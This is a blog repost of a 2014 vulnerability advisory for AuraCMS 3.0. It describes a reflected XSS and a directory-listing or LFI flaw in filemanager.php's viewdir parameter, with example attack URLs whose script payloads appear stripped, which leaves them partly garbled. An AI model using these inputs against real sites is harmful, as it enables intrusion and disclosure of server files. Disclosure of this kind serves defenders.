Exploit AuraCMS 3.0

AuraCMS 3.0 - Multiple Vulnerabilities

# Exploit Title: AuraCMS 3.0 Multiple Vulnerabilities
# Date: 05/28/2014
# Author: Mustafa ALTINKAYNAK
# Download URL :http://auracms.org/
# Software Link: http://codeload.github.com/auracms/AuraCMS/zip/master
# Vuln Category: CWE-79 (XSS) - CWE-98 (LFI)
# Tested on: AuraCMS 3.0
# Tested Local Platform : XAMP on Windows 8
# Patch/ Fix: Not published.
---------------------------
  
Technical Details
---------------------------
1) Reflected XSS : FileManager is a parameter unfiltered view of the file.  
Ex: filemanager.php?viewdir=">
 
2) LFI (Local File Include) : Directory listing is done.  
Ex : filemanager.php?viewdir=/home
 
---------------------------------------------------------------------------------
# filemanager.php (Between 263,311 line)
Example : domain.com/auracms/filemanager.php?viewdir=request
280 line : 
 
Example 2 : domain.com/auracms/filemanager.php?viewdir=">
" name="return" />
 
Example 3 : domain.com/auracms/filemanager.php?viewdir=
" name="return" /> Bingooo :)
 

        












                
                
            




              


                    

                        
                         px

About Elmirakom

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.

T I S

Exploit AuraCMS 3.0

AuraCMS 3.0 - Multiple Vulnerabilities

About Elmirakom

0 comments:

Post a Comment

Video Of Day

Exploit AuraCMS 3.0

AuraCMS 3.0 - Multiple Vulnerabilities

About Elmirakom

RELATED POSTS

0 comments:

Post a Comment